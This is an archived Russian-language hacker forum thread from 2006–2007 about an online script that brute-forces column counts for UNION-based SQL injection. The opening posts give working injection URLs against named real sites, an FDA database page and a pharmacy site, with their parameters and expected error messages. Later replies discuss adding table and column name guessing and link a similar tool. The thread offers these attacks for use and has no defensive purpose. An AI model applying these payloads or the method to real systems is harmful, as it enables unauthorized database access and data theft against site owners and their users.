Скрипт для перебора полей. [Архив]

Просмотр полной версии : Скрипт для перебора полей.

guest3297

20.10.2006, 01:11

Вот написал.
_http://pidor.in/sql-scan.php

Как юзать.

host
www.accessdata.fda.gov

левая часть.
/scripts/cder/onctools/studies.cfm?ID=1+union+select+

Правая часть.
--

Ошибка.
must have an equal number of expressions

Максимальное чисто колонок.
200

Работает как на mysql там и на mssql.
Внимае в колонку ошибка вводить данные ошибки колва столбцов. это может быть 1 слово или фраза главное что бы она не встретилась при выводе с нулями...

Смотрим ошибку.
http://www.accessdata.fda.gov/scripts/cder/onctools/studies.cfm?ID=1+union+select+1--
При точном кол ве полей она другая.

guest3297

24.10.2006, 11:00

Малясь оптимизировал работу.
Теперь гараздо быстрее...

Планируеться седать перебор колонок и таблиц.
Кто хочет помочь можете постить заумные названия колонки и таблиц.

Просьба постить с пометкой колонки это или таблицы.

guest3297

24.10.2006, 11:03

Пример на php

host :www.pharm-system.com
left : /index.phtml?page=news&id=-1+union+select+
right : /*
erorr : Error in query 2 The used SELECT statements have a different number of columns (смотрим тут http://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+1/*)
coll : 30

steamer

25.10.2006, 19:26

Можно для перебора имен таблиц добавить еще и префикс. А то часто такое бывает, вроде и имена должны быть стандартные, набираешь, а нифига.

guest3297

07.11.2006, 23:58

Еще одно обновление.
Не как не могу разобраться с перебором таблиц.
Скоро будет добавленна опция debug.
И перебор таблиц.

blackybr

08.11.2006, 00:44

перебор по словарю? имхо на пхп слишком энергоемко )

guest3297

08.11.2006, 00:53

Почему словарь будет небольшой... порядка 40 записей...
Все в масив и по 1 подставлять...

aka PSIH

08.11.2006, 08:39

[ cash ]
Ты бы сорец выложил...

guest3297

08.11.2006, 15:42

Сорец распространяться не будет.

limpompo

08.11.2006, 15:54

[ cash ] - а жаль

aka PSIH

08.11.2006, 16:10

[ cash ]
Где гарантии что все sql-injection не сохраняются?

guest3297

08.11.2006, 16:19

Я не каму не обязан давать каких гарантий и вообще откуда такое хамское поведение....

nc.STRIEM

11.01.2007, 03:00

я тож когдато брутер sql писал...
собсно мой вариант: http://striem.org/sql/
ток у меня имена таблиц/колонок подбирает.

~!DoK_tOR!~

11.01.2007, 07:24

Да неплохо [ cash ] Respekt )))))))

.Slip

11.01.2007, 09:06

Проверил, всегда находит одну колонку. Сколько бы небыло в скуле их=) Так что низачот.
[sL1p] стукни в асю...
Заходи на канал, я там сейчас:)

guest3297

11.01.2007, 09:19

[sL1p] стукни в асю...

genom--

12.01.2007, 21:37

жуткий приват